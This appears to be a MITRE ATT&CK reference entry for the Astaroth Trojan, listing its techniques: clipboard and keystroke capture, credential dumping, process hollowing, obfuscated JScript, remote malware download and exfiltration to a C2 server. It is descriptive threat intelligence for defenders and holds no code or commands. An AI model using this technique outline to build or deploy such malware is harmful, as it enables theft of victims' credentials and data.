Astaroth

Astaroth is a Trojan and information stealer known to affect companies in Europe and Brazil. It has been known publicly since at least late 2017. [1] [2]

ID: S0373
Type: MALWARE
Contributors: Carlos Borges, CIP

Platforms: Windows

Version: 1.0

Techniques Used

DomainIDNameUse
EnterpriseT1115Clipboard DataAstaroth collects information from the clipboard by using the OpenClipboard() and GetClipboardData() libraries.[1]
EnterpriseT1059Command-Line Interface Astaroth spawns a CMD process to execute commands.[1]
EnterpriseT1223Compiled HTML FileAstaroth uses ActiveX objects for file execution and manipulation.[2]
EnterpriseT1003Credential DumpingAstaroth uses an external software known as NetPass to recover passwords.[1]
EnterpriseT1132Data EncodingAstaroth encodes data using Base64 before sending it to the C2 server.[2]
EnterpriseT1074Data StagedAstaroth collects data in a plaintext file named r1.log before exfiltration.[2]
EnterpriseT1140Deobfuscate/Decode Files or InformationAstaroth uses a fromCharCode() deobfuscation method to avoid explicitly writing execution commands and to hide its code.[1]
EnterpriseT1129Execution through Module LoadAstaroth uses the LoadLibraryExW() function to load additional modules.[1]
EnterpriseT1041Exfiltration Over Command and Control ChannelAstaroth exfiltrates collected information from its r1.log file to the external C2 server.[1]
EnterpriseT1056Input CaptureAstaroth logs keystrokes from the victim's machine.[2]
EnterpriseT1027Obfuscated Files or InformationAstaroth obfuscates its JScript code.[1]
EnterpriseT1057Process DiscoveryAstaroth searches for different processes on the system.[1]
EnterpriseT1093Process HollowingAstaroth searches for unins000.exe (GAS Tecnologia software), Syswow64\userinit.exe or System32\userinit.exe to evasively create a new process in suspended state.[1]
EnterpriseT1060Registry Run Keys / Startup FolderAstaroth creates a startup item for persistence.[2]
EnterpriseT1117Regsvr32Astaroth can be loaded through regsvr32.exe.[1]
EnterpriseT1105Remote File CopyAstaroth uses certutil and BITSAdmin to download additional malware.[2][1]
EnterpriseT1064ScriptingAstaroth uses JavaScript to perform its core functionalities.[2]
EnterpriseT1063Security Software DiscoveryAstaroth checks for the presence of Avast antivirus in the C:\Program\Files\ folder.[2]
EnterpriseT1023Shortcut ModificationAstaroth's initial payload is a malicious .LNK file.(Citation :Cybereason Astaroth Feb 2019)[2]
EnterpriseT1045Software PackingAstaroth uses a software packer called Pe123\RPolyCryptor.[1]
EnterpriseT1082System Information DiscoveryAstaroth collects the machine name and keyboard language from the system.[2][1]
EnterpriseT1016System Network Configuration DiscoveryAstaroth collects the external IP address from the system.[2]
EnterpriseT1124System Time DiscoveryAstaroth collects the timestamp from the infected machine.[2]
EnterpriseT1047Windows Management InstrumentationAstaroth uses WMIC to execute payloads.[2]
EnterpriseT1220XSL Script ProcessingAstaroth executes embedded JScript or VBScript in an XSL stylesheet located on a remote domain.[1]

References